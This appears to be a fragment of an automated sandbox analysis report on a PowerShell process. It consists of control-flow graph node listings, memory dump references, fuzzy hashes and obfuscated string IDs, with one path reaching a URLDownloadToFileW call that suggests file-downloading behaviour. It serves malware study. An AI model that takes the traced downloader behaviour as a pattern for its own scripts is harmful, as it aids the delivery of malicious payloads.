                                                                        control_flow_graph 338 4ba7a18-4ba7a4a 339 4ba7a4c-4ba7a53 338->339 340 4ba7a90 338->340 342 4ba7a64 339->342 343 4ba7a55-4ba7a62 339->343 341 4ba7a93-4ba7acf 340->341 349 4ba7b58-4ba7b63 341->349 350 4ba7ad5-4ba7ade 341->350 344 4ba7a66-4ba7a68 342->344 343->344 347 4ba7a6a-4ba7a6d 344->347 348 4ba7a6f-4ba7a71 344->348 351 4ba7a8e 347->351 352 4ba7a82 348->352 353 4ba7a73-4ba7a80 348->353 355 4ba7b72-4ba7b94 349->355 356 4ba7b65-4ba7b68 349->356 350->349 357 4ba7ae0-4ba7ae6 350->357 351->341 354 4ba7a84-4ba7a86 352->354 353->354 354->351 364 4ba7b9a-4ba7ba3 355->364 365 4ba7c5e-4ba7cf6 355->365 356->355 358 4ba7de8-4ba7dfd 357->358 359 4ba7aec-4ba7af9 357->359 367 4ba7e49-4ba7e52 358->367 368 4ba7dff-4ba7e43 358->368 362 4ba7afb-4ba7b2e 359->362 363 4ba7b4f-4ba7b56 359->363 377 4ba7b4b 362->377 378 4ba7b30-4ba7b33 362->378 363->349 363->357 364->358 369 4ba7ba9-4ba7be7 364->369 405 4ba7cf9-4ba7d52 365->405 379 4ba7e5d-4ba7e63 367->379 380 4ba7e54-4ba7e5a 367->380 368->367 386 4ba7be9-4ba7bff 369->386 387 4ba7c01-4ba7c14 369->387 377->363 382 4ba7b3f-4ba7b48 378->382 383 4ba7b35-4ba7b38 378->383 384 4ba7e71-4ba7ea6 URLDownloadToFileW 379->384 385 4ba7e65-4ba7e6e 379->385 380->379 383->382 389 4ba7ea8-4ba7eae 384->389 390 4ba7eaf-4ba7ec3 384->390 385->384 391 4ba7c16-4ba7c1d 386->391 387->391 389->390 392 4ba7c1f-4ba7c30 391->392 393 4ba7c42-4ba7c58 391->393 392->393 399 4ba7c32-4ba7c3b 392->399 393->364 393->365 399->393 418 4ba7d55 call 75e45f3 405->418 419 4ba7d55 call 75e4610 405->419 410 4ba7d57-4ba7d60 411 4ba7d7a-4ba7d8d 410->411 412 4ba7d62-4ba7d78 410->412 413 4ba7d8f-4ba7d96 411->413 412->413 414 4ba7d98-4ba7d9e 413->414 415 4ba7da5-4ba7daf 413->415 414->415 415->405 418->410 419->410
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1797950923.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_4ba0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3731060989b263f6bd3e6185c60ba5e923a406bfb41e5b30243954c6bbe0bf25
                                                                        • Instruction ID: ca633d07c4fb23fd03c88fb1ff4bb389c49f0112ac16f2f1f057a4400c81b337
                                                                        • Opcode Fuzzy Hash: 3731060989b263f6bd3e6185c60ba5e923a406bfb41e5b30243954c6bbe0bf25
                                                                        • Instruction Fuzzy Hash: 6BE14975A04209EFDB05DF98D584A9EFBB2FF88310F248559E804AB360DB31ED95CB90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 75e1f40-75e1f65 1 75e1f6b-75e1f70 0->1 2 75e2158-75e21a2 0->2 3 75e1f88-75e1f8c 1->3 4 75e1f72-75e1f78 1->4 19 75e21a8-75e21ad 2->19 20 75e2326-75e236a 2->20 7 75e2108-75e2112 3->7 8 75e1f92-75e1f94 3->8 5 75e1f7c-75e1f86 4->5 6 75e1f7a 4->6 5->3 6->3 10 75e2114-75e211d 7->10 11 75e2120-75e2126 7->11 12 75e1f96-75e1fa2 8->12 13 75e1fa4 8->13 15 75e212c-75e2138 11->15 16 75e2128-75e212a 11->16 18 75e1fa6-75e1fa8 12->18 13->18 21 75e213a-75e2155 15->21 16->21 18->7 22 75e1fae-75e1fcd 18->22 24 75e21af-75e21b5 19->24 25 75e21c5-75e21c9 19->25 44 75e2480-75e24b5 20->44 45 75e2370-75e2375 20->45 48 75e1fcf-75e1fdb 22->48 49 75e1fdd 22->49 26 75e21b9-75e21c3 24->26 27 75e21b7 24->27 29 75e21cf-75e21d1 25->29 30 75e22d8-75e22e2 25->30 26->25 27->25 33 75e21d3-75e21df 29->33 34 75e21e1 29->34 35 75e22ef-75e22f5 30->35 36 75e22e4-75e22ec 30->36 38 75e21e3-75e21e5 33->38 34->38 40 75e22fb-75e2307 35->40 41 75e22f7-75e22f9 35->41 38->30 46 75e21eb-75e220a 38->46 47 75e2309-75e2323 40->47 41->47 82 75e24b7-75e24d9 44->82 83 75e24e3-75e24ed 44->83 51 75e238d-75e2391 45->51 52 75e2377-75e237d 45->52 80 75e220c-75e2218 46->80 81 75e221a 46->81 50 75e1fdf-75e1fe1 48->50 49->50 50->7 54 75e1fe7-75e1fee 50->54 58 75e2397-75e2399 51->58 59 75e2432-75e243c 51->59 55 75e237f 52->55 56 75e2381-75e238b 52->56 54->2 62 75e1ff4-75e1ff9 54->62 55->51 56->51 63 75e239b-75e23a7 58->63 64 75e23a9 58->64 65 75e243e-75e2446 59->65 66 75e2449-75e244f 59->66 69 75e1ffb-75e2001 62->69 70 75e2011-75e2020 62->70 73 75e23ab-75e23ad 63->73 64->73 67 75e2455-75e2461 66->67 68 75e2451-75e2453 66->68 77 75e2463-75e247d 67->77 68->77 78 75e2005-75e200f 69->78 79 75e2003 69->79 70->7 100 75e2026-75e2044 70->100 73->59 76 75e23b3-75e23b5 73->76 84 75e23cf-75e23d6 76->84 85 75e23b7-75e23bd 76->85 78->70 79->70 86 75e221c-75e221e 80->86 81->86 113 75e252d-75e2556 82->113 114 75e24db-75e24e0 82->114 88 75e24ef-75e24f4 83->88 89 75e24f7-75e24fd 83->89 93 75e23ee-75e242f 84->93 94 75e23d8-75e23de 84->94 91 75e23bf 85->91 92 75e23c1-75e23cd 85->92 86->30 101 75e2224-75e225b 86->101 97 75e24ff-75e2501 89->97 98 75e2503-75e250f 89->98 91->84 92->84 102 75e23e2-75e23ec 94->102 103 75e23e0 94->103 104 75e2511-75e252a 97->104 98->104 100->7 119 75e204a-75e206f 100->119 123 75e225d-75e2263 101->123 124 75e2275-75e227c 101->124 102->93 103->93 130 75e2558-75e257e 113->130 131 75e2585-75e25b4 113->131 119->7 136 75e2075-75e207c 119->136 126 75e2267-75e2273 123->126 127 75e2265 123->127 128 75e227e-75e2284 124->128 129 75e2294-75e22d5 124->129 126->124 127->124 133 75e2288-75e2292 128->133 134 75e2286 128->134 130->131 143 75e25ed-75e25f7 131->143 144 75e25b6-75e25d3 131->144 133->129 134->129 141 75e207e-75e2099 136->141 142 75e20c2-75e20f5 136->142 156 75e209b-75e20a1 141->156 157 75e20b3-75e20b7 141->157 165 75e20fc-75e2105 142->165 145 75e25f9-75e25fd 143->145 146 75e2600-75e2606 143->146 153 75e263d-75e2642 144->153 154 75e25d5-75e25e7 144->154 150 75e260c-75e2618 146->150 151 75e2608-75e260a 146->151 155 75e261a-75e263a 150->155 151->155 153->154 154->143 160 75e20a5-75e20b1 156->160 161 75e20a3 156->161 162 75e20be-75e20c0 157->162 160->157 161->157 162->165
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                        • API String ID: 0-1420252700
                                                                        • Opcode ID: 8fc3025ecb639642f9956c1f7aa3f1ff95f3f5e758063b95e81d3d81a18339f0
                                                                        • Instruction ID: 33bc5f80cb5f345f6ca9c32c530f12ec7a3680d38773ef21d2ce89447ab6c42d
                                                                        • Opcode Fuzzy Hash: 8fc3025ecb639642f9956c1f7aa3f1ff95f3f5e758063b95e81d3d81a18339f0
                                                                        • Instruction Fuzzy Hash: B8124BB1B046159FC7198B6898107AA7BAEBFD5310F1484BBD505CF299DF32C981C7E2

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 172 75e4610-75e463b 173 75e4af2-75e4b25 172->173 174 75e4641-75e4646 172->174 187 75e4b27-75e4b33 173->187 188 75e4b35 173->188 175 75e465e-75e4663 174->175 176 75e4648-75e464e 174->176 180 75e4665-75e4671 175->180 181 75e4673 175->181 177 75e4652-75e465c 176->177 178 75e4650 176->178 177->175 178->175 182 75e4675-75e4677 180->182 181->182 185 75e467d-75e4687 182->185 186 75e4a93-75e4a9d 182->186 185->173 191 75e468d-75e4692 185->191 189 75e4a9f-75e4aa8 186->189 190 75e4aab-75e4ab1 186->190 192 75e4b37-75e4b39 187->192 188->192 193 75e4ab7-75e4ac3 190->193 194 75e4ab3-75e4ab5 190->194 195 75e46aa-75e46b8 191->195 196 75e4694-75e469a 191->196 197 75e4b7b-75e4b85 192->197 198 75e4b3b-75e4b42 192->198 199 75e4ac5-75e4aef 193->199 194->199 195->186 209 75e46be-75e46dd 195->209 200 75e469e-75e46a8 196->200 201 75e469c 196->201 203 75e4b8e-75e4b94 197->203 204 75e4b87-75e4b8b 197->204 198->197 205 75e4b44-75e4b61 198->205 200->195 201->195 210 75e4b9a-75e4ba6 203->210 211 75e4b96-75e4b98 203->211 214 75e4bc9-75e4bce 205->214 215 75e4b63-75e4b75 205->215 209->186 222 75e46e3-75e46ed 209->222 212 75e4ba8-75e4bc6 210->212 211->212 214->215 215->197 222->173 224 75e46f3-75e46f8 222->224 225 75e46fa-75e4700 224->225 226 75e4710-75e4714 224->226 228 75e4704-75e470e 225->228 229 75e4702 225->229 226->186 227 75e471a-75e471e 226->227 227->186 230 75e4724-75e4728 227->230 228->226 229->226 230->186 231 75e472e-75e473e 230->231 233 75e47c6-75e4815 231->233 234 75e4744-75e476b 231->234 251 75e481c-75e482f 233->251 239 75e476d-75e4773 234->239 240 75e4785-75e47b3 234->240 241 75e4777-75e4783 239->241 242 75e4775 239->242 249 75e47b5-75e47b7 240->249 250 75e47c1-75e47c4 240->250 241->240 242->240 249->250 250->251 252 75e48b7-75e4906 251->252 253 75e4835-75e485c 251->253 270 75e490d-75e4920 252->270 258 75e485e-75e4864 253->258 259 75e4876-75e48a4 253->259 260 75e4868-75e4874 258->260 261 75e4866 258->261 267 75e48a6-75e48a8 259->267 268 75e48b2-75e48b5 259->268 260->259 261->259 267->268 268->270 271 75e49a8-75e49f7 270->271 272 75e4926-75e494d 270->272 289 75e49fe-75e4a2c 271->289 277 75e494f-75e4955 272->277 278 75e4967-75e4995 272->278 279 75e4959-75e4965 277->279 280 75e4957 277->280 286 75e4997-75e4999 278->286 287 75e49a3-75e49a6 278->287 279->278 280->278 286->287 287->289 294 75e4a2f call 4ba7a18 289->294 295 75e4a2f call 4ba7a08 289->295 296 75e4a2f call 4ba1bf8 289->296 297 75e4a2f call 4ba7c45 289->297 292 75e4a34-75e4a90 294->292 295->292 296->292 297->292
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tP^q$tP^q
                                                                        • API String ID: 0-309238000
                                                                        • Opcode ID: a07e2756da18baeecdd6c60b68961b969f18825bdf18c9094ab31832aab4c52d
                                                                        • Instruction ID: d23f59042a5e1bc3887c716154bee9b16e2ead47cdadcbfe2843c7c87c7d7248
                                                                        • Opcode Fuzzy Hash: a07e2756da18baeecdd6c60b68961b969f18825bdf18c9094ab31832aab4c52d
                                                                        • Instruction Fuzzy Hash: CAF1E6B1B002459FCB189F68D804BAEBBEAFBC8710F15886AF9059F354DB72DC458791

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 298 75e04f8-75e050a 299 75e05ca-75e05fd 298->299 300 75e0510-75e0521 298->300 308 75e05ff-75e063e 299->308 309 75e066b-75e0675 299->309 303 75e053b-75e0558 300->303 304 75e0523-75e0529 300->304 303->299 313 75e055a-75e057c 303->313 306 75e052d-75e0539 304->306 307 75e052b 304->307 306->303 307->303 332 75e06bb-75e06c0 308->332 333 75e0640-75e064e 308->333 311 75e0677-75e067d 309->311 312 75e0680-75e0686 309->312 315 75e068c-75e0698 312->315 316 75e0688-75e068a 312->316 322 75e057e-75e0584 313->322 323 75e0596-75e05ae 313->323 318 75e069a-75e06b8 315->318 316->318 325 75e0588-75e0594 322->325 326 75e0586 322->326 329 75e05bc-75e05c7 323->329 330 75e05b0-75e05b2 323->330 325->323 326->323 330->329 332->333 337 75e0656-75e0665 333->337 337->309
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tP^q$tP^q
                                                                        • API String ID: 0-309238000
                                                                        • Opcode ID: 5e0384acb8c5e3469d80086784269461d7a4a53d3226cd4a679bdbec0da1f89c
                                                                        • Instruction ID: 54ec3021cc74f45a69fced1065c9d0ff66681ca85a90c721996c34c43122295a
                                                                        • Opcode Fuzzy Hash: 5e0384acb8c5e3469d80086784269461d7a4a53d3226cd4a679bdbec0da1f89c
                                                                        • Instruction Fuzzy Hash: 8A5148B1B042546FCB145B689810BAABBEAFBC5720F24885BE548DF3C1DAB1DC4587A1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 420 4ba1bf8-4ba7e52 424 4ba7e5d-4ba7e63 420->424 425 4ba7e54-4ba7e5a 420->425 426 4ba7e71-4ba7ea6 URLDownloadToFileW 424->426 427 4ba7e65-4ba7e6e 424->427 425->424 428 4ba7ea8-4ba7eae 426->428 429 4ba7eaf-4ba7ec3 426->429 427->426 428->429
                                                                        APIs
                                                                        • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04BA7E99
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1797950923.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_4ba0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadFile
                                                                        • String ID:
                                                                        • API String ID: 1407266417-0
                                                                        • Opcode ID: 28d0eba17fa0b722140a422ecc926dc34e84903750037c89936e00fa36327560
                                                                        • Instruction ID: adb2522ad18e2aa7bbfb7108e47c109590a112ea63e609506a51ae0a16cc64b7
                                                                        • Opcode Fuzzy Hash: 28d0eba17fa0b722140a422ecc926dc34e84903750037c89936e00fa36327560
                                                                        • Instruction Fuzzy Hash: 982126B5D05219EFCB10CF99D884ADEFBF8FB48310F10856AE918A7210D774AA50CFA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 431 75e45f3-75e463b 433 75e4af2-75e4b25 431->433 434 75e4641-75e4646 431->434 447 75e4b27-75e4b33 433->447 448 75e4b35 433->448 435 75e465e-75e4663 434->435 436 75e4648-75e464e 434->436 440 75e4665-75e4671 435->440 441 75e4673 435->441 437 75e4652-75e465c 436->437 438 75e4650 436->438 437->435 438->435 442 75e4675-75e4677 440->442 441->442 445 75e467d-75e4687 442->445 446 75e4a93-75e4a9d 442->446 445->433 451 75e468d-75e4692 445->451 449 75e4a9f-75e4aa8 446->449 450 75e4aab-75e4ab1 446->450 452 75e4b37-75e4b39 447->452 448->452 453 75e4ab7-75e4ac3 450->453 454 75e4ab3-75e4ab5 450->454 455 75e46aa-75e46b8 451->455 456 75e4694-75e469a 451->456 457 75e4b7b-75e4b85 452->457 458 75e4b3b-75e4b42 452->458 459 75e4ac5-75e4aef 453->459 454->459 455->446 469 75e46be-75e46dd 455->469 460 75e469e-75e46a8 456->460 461 75e469c 456->461 463 75e4b8e-75e4b94 457->463 464 75e4b87-75e4b8b 457->464 458->457 465 75e4b44-75e4b61 458->465 460->455 461->455 470 75e4b9a-75e4ba6 463->470 471 75e4b96-75e4b98 463->471 474 75e4bc9-75e4bce 465->474 475 75e4b63-75e4b75 465->475 469->446 482 75e46e3-75e46ed 469->482 472 75e4ba8-75e4bc6 470->472 471->472 474->475 475->457 482->433 484 75e46f3-75e46f8 482->484 485 75e46fa-75e4700 484->485 486 75e4710-75e4714 484->486 488 75e4704-75e470e 485->488 489 75e4702 485->489 486->446 487 75e471a-75e471e 486->487 487->446 490 75e4724-75e4728 487->490 488->486 489->486 490->446 491 75e472e-75e473e 490->491 493 75e47c6-75e4815 491->493 494 75e4744-75e476b 491->494 511 75e481c-75e482f 493->511 499 75e476d-75e4773 494->499 500 75e4785-75e47b3 494->500 501 75e4777-75e4783 499->501 502 75e4775 499->502 509 75e47b5-75e47b7 500->509 510 75e47c1-75e47c4 500->510 501->500 502->500 509->510 510->511 512 75e48b7-75e4906 511->512 513 75e4835-75e485c 511->513 530 75e490d-75e4920 512->530 518 75e485e-75e4864 513->518 519 75e4876-75e48a4 513->519 520 75e4868-75e4874 518->520 521 75e4866 518->521 527 75e48a6-75e48a8 519->527 528 75e48b2-75e48b5 519->528 520->519 521->519 527->528 528->530 531 75e49a8-75e49f7 530->531 532 75e4926-75e494d 530->532 549 75e49fe-75e4a2c 531->549 537 75e494f-75e4955 532->537 538 75e4967-75e4995 532->538 539 75e4959-75e4965 537->539 540 75e4957 537->540 546 75e4997-75e4999 538->546 547 75e49a3-75e49a6 538->547 539->538 540->538 546->547 547->549 554 75e4a2f call 4ba7a18 549->554 555 75e4a2f call 4ba7a08 549->555 556 75e4a2f call 4ba1bf8 549->556 557 75e4a2f call 4ba7c45 549->557 552 75e4a34-75e4a90 554->552 555->552 556->552 557->552
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tP^q
                                                                        • API String ID: 0-2862610199
                                                                        • Opcode ID: 43524145b9e3731b4090dad67f85cafdf5eb5bc4cee03e098af4037b95881c10
                                                                        • Instruction ID: 86f7faffaf0c22f59895a0f979f967b81df67d4c6934dfa451d8796375beacb5
                                                                        • Opcode Fuzzy Hash: 43524145b9e3731b4090dad67f85cafdf5eb5bc4cee03e098af4037b95881c10
                                                                        • Instruction Fuzzy Hash: FA91C5B0E00285AFCB188F58D444BAABBE6FB88710F19846AF915AF354DB71DC45CB91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 754 75e1f24-75e1f65 756 75e1f6b-75e1f70 754->756 757 75e2158-75e21a2 754->757 758 75e1f88-75e1f8c 756->758 759 75e1f72-75e1f78 756->759 774 75e21a8-75e21ad 757->774 775 75e2326-75e236a 757->775 762 75e2108-75e2112 758->762 763 75e1f92-75e1f94 758->763 760 75e1f7c-75e1f86 759->760 761 75e1f7a 759->761 760->758 761->758 765 75e2114-75e211d 762->765 766 75e2120-75e2126 762->766 767 75e1f96-75e1fa2 763->767 768 75e1fa4 763->768 770 75e212c-75e2138 766->770 771 75e2128-75e212a 766->771 773 75e1fa6-75e1fa8 767->773 768->773 776 75e213a-75e2155 770->776 771->776 773->762 777 75e1fae-75e1fcd 773->777 779 75e21af-75e21b5 774->779 780 75e21c5-75e21c9 774->780 799 75e2480-75e24b5 775->799 800 75e2370-75e2375 775->800 803 75e1fcf-75e1fdb 777->803 804 75e1fdd 777->804 781 75e21b9-75e21c3 779->781 782 75e21b7 779->782 784 75e21cf-75e21d1 780->784 785 75e22d8-75e22e2 780->785 781->780 782->780 788 75e21d3-75e21df 784->788 789 75e21e1 784->789 790 75e22ef-75e22f5 785->790 791 75e22e4-75e22ec 785->791 793 75e21e3-75e21e5 788->793 789->793 795 75e22fb-75e2307 790->795 796 75e22f7-75e22f9 790->796 793->785 801 75e21eb-75e220a 793->801 802 75e2309-75e2323 795->802 796->802 837 75e24b7-75e24d9 799->837 838 75e24e3-75e24ed 799->838 806 75e238d-75e2391 800->806 807 75e2377-75e237d 800->807 835 75e220c-75e2218 801->835 836 75e221a 801->836 805 75e1fdf-75e1fe1 803->805 804->805 805->762 809 75e1fe7-75e1fee 805->809 813 75e2397-75e2399 806->813 814 75e2432-75e243c 806->814 810 75e237f 807->810 811 75e2381-75e238b 807->811 809->757 817 75e1ff4-75e1ff9 809->817 810->806 811->806 818 75e239b-75e23a7 813->818 819 75e23a9 813->819 820 75e243e-75e2446 814->820 821 75e2449-75e244f 814->821 824 75e1ffb-75e2001 817->824 825 75e2011-75e2020 817->825 828 75e23ab-75e23ad 818->828 819->828 822 75e2455-75e2461 821->822 823 75e2451-75e2453 821->823 832 75e2463-75e247d 822->832 823->832 833 75e2005-75e200f 824->833 834 75e2003 824->834 825->762 855 75e2026-75e2044 825->855 828->814 831 75e23b3-75e23b5 828->831 839 75e23cf-75e23d6 831->839 840 75e23b7-75e23bd 831->840 833->825 834->825 841 75e221c-75e221e 835->841 836->841 868 75e252d-75e2556 837->868 869 75e24db-75e24e0 837->869 843 75e24ef-75e24f4 838->843 844 75e24f7-75e24fd 838->844 848 75e23ee-75e242f 839->848 849 75e23d8-75e23de 839->849 846 75e23bf 840->846 847 75e23c1-75e23cd 840->847 841->785 856 75e2224-75e225b 841->856 852 75e24ff-75e2501 844->852 853 75e2503-75e250f 844->853 846->839 847->839 857 75e23e2-75e23ec 849->857 858 75e23e0 849->858 859 75e2511-75e252a 852->859 853->859 855->762 874 75e204a-75e206f 855->874 878 75e225d-75e2263 856->878 879 75e2275-75e227c 856->879 857->848 858->848 885 75e2558-75e257e 868->885 886 75e2585-75e25b4 868->886 874->762 891 75e2075-75e207c 874->891 881 75e2267-75e2273 878->881 882 75e2265 878->882 883 75e227e-75e2284 879->883 884 75e2294-75e22d5 879->884 881->879 882->879 888 75e2288-75e2292 883->888 889 75e2286 883->889 885->886 898 75e25ed-75e25f7 886->898 899 75e25b6-75e25d3 886->899 888->884 889->884 896 75e207e-75e2099 891->896 897 75e20c2-75e20f5 891->897 911 75e209b-75e20a1 896->911 912 75e20b3-75e20b7 896->912 920 75e20fc-75e2105 897->920 900 75e25f9-75e25fd 898->900 901 75e2600-75e2606 898->901 908 75e263d-75e2642 899->908 909 75e25d5-75e25e7 899->909 905 75e260c-75e2618 901->905 906 75e2608-75e260a 901->906 910 75e261a-75e263a 905->910 906->910 908->909 909->898 915 75e20a5-75e20b1 911->915 916 75e20a3 911->916 917 75e20be-75e20c0 912->917 915->912 916->912 917->920
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c060dc16c6fc6c19c19dfbd8909418560bbf561463abb2516a82849aa009b43f
                                                                        • Instruction ID: 54e8f1ba01f16f50b54b7b6313f956f78963f1aea62f6683192c1d865d6e2f22
                                                                        • Opcode Fuzzy Hash: c060dc16c6fc6c19c19dfbd8909418560bbf561463abb2516a82849aa009b43f
                                                                        • Instruction Fuzzy Hash: A541F8F0A04616DFCB2CCF149840AF97BA9BF95210F5980AAC604DF299D731D981C7E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1797597643.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2fad000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f4922c9d2cf9b4611f2b9833431b855b8533ae3cdc748435eb70275da34a98f
                                                                        • Instruction ID: 7e56f95df1037a17d35ed04a0b1e47e3dc46e325299e76139d8105c3c9d35b13
                                                                        • Opcode Fuzzy Hash: 4f4922c9d2cf9b4611f2b9833431b855b8533ae3cdc748435eb70275da34a98f
                                                                        • Instruction Fuzzy Hash: 4C012BB15083409EE7104E29CD85767BFD8EF41BA4F08C429EE480B54AC379D841C6B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1797597643.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2fad000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2775788e852ef37ae432671661d1cf924e8c86a2d41b9be40857d35306e79e37
                                                                        • Instruction ID: fbe4fc93e015c9b794c900597e2ee1dd0e123d8075a3ff0bcdaff077d3f6e291
                                                                        • Opcode Fuzzy Hash: 2775788e852ef37ae432671661d1cf924e8c86a2d41b9be40857d35306e79e37
                                                                        • Instruction Fuzzy Hash: 1C019E6140E3C09FD7128B2588A4B56BFB4EF53624F0DC0CBD9888F1A7C2699849C772
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q
                                                                        • API String ID: 0-3360155381
                                                                        • Opcode ID: d3ce8e3985456446d89fd419057fa06f0591b1078e7d6db3b708326ad8bb6801
                                                                        • Instruction ID: f92466ec71cf586056f494aa4fa49e9795183349baf8b7b7565605635869e207
                                                                        • Opcode Fuzzy Hash: d3ce8e3985456446d89fd419057fa06f0591b1078e7d6db3b708326ad8bb6801
                                                                        • Instruction Fuzzy Hash: BBC15CB1B0474D9FD72D8B6998047EABFAABF86310F1484ABD145CF391EA31C845C791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                        • API String ID: 0-1420252700
                                                                        • Opcode ID: 62ab5f37b7ac840c64e6962c45850f2b9c4af70a1e8a19f8673ad6471c6bc208
                                                                        • Instruction ID: 7371bb0e186e49da1a7704f798ecf8c8defe711f8c4fbaec4ee5b0e8079af837
                                                                        • Opcode Fuzzy Hash: 62ab5f37b7ac840c64e6962c45850f2b9c4af70a1e8a19f8673ad6471c6bc208
                                                                        • Instruction Fuzzy Hash: 398116B1B082059FCB1C9B69D4446EABBFAFF86210F1484BBD455CB251EB36C845C7A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2125118731
                                                                        • Opcode ID: 780ccb3d1c586ec1692d969b67fcd2aa30382ce5d90c263ea2b31de50a3d7e65
                                                                        • Instruction ID: e3061d1712e124bced7bfce699031f72adbd0fd4c0801c6e3608729fef95dd9c
                                                                        • Opcode Fuzzy Hash: 780ccb3d1c586ec1692d969b67fcd2aa30382ce5d90c263ea2b31de50a3d7e65
                                                                        • Instruction Fuzzy Hash: 262135B17043466BDB3C9A7A9840BB7ABDEABC0710F24882BE405CF385DD72C8458761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1802399888.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_75e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                        • API String ID: 0-2049395529
                                                                        • Opcode ID: fc310847dbe1dc9270e07f424391e5826d3418d7e248065271adbc5d235a9796
                                                                        • Instruction ID: 2f556244d6c640f7ca8a1c2b8e81a423ce9ea156b0de5ba8651e191afec1d3d3
                                                                        • Opcode Fuzzy Hash: fc310847dbe1dc9270e07f424391e5826d3418d7e248065271adbc5d235a9796
                                                                        • Instruction Fuzzy Hash: 2001F760B083850FC72E02281C245A62FB67BD25107B984EBC044DF2DBCDA54C4A83E3
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.1838861823.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_d8d000_powershell.jbxd
                                                                        Similarity
